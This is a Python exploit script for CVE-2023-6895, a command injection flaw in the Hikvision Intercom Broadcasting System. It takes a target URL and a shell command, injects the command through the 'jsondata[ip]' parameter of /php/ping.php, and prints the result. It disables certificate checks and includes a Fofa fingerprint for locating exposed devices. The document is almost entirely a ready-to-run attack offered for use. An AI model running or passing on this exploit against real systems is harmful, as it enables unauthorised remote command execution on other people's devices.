README.md
Rendering markdown...
import argparse
import requests
def get_args():
parser = argparse.ArgumentParser(prog="CVE-2023-6895.py",
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=50),
)
parser.add_argument("-u", "--url", help="URL of target site (ex: http://target.com)")
parser.add_argument("-c", "--cmd", default="id", help="Command to execute (default = id)")
args = parser.parse_args()
return args
def Exploit(url, cmd):
cmd = "jsondata%5Btype%5D=3&jsondata%5Bip%5D=" + cmd
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
'Pragma': 'no-cache',
'Upgrade-Insecure-Requests': '1',
'Content-Type': 'application/x-www-form-urlencoded',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Sec-Fetch-Dest': 'document',
'Sec-Fetch-Mode': 'navigate',
'Sec-Fetch-Site': 'none',
'Sec-Fetch-User': '?1',
'Te': 'trailers',
'Connection': 'close'
}
expurl = url + '/php/ping.php'
requests.packages.urllib3.disable_warnings()
try:
req = requests.post(expurl, data=cmd, headers=headers, timeout=10, verify=False)
data = str(req.text.encode('utf-8').decode('unicode_escape'))
print("目标:" + url + "结果:" + data)
except:
pass
def main():
print()
print('===================================================================================')
print('| Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK) |')
print('| CVE-2023-6895 |')
print('| by FuBoLuSEC |')
print('| Fofa:icon_hash="-1830859634" |')
print('===================================================================================\n')
args = get_args()
Exploit(args.url, args.cmd.strip())
if __name__ == '__main__':
main()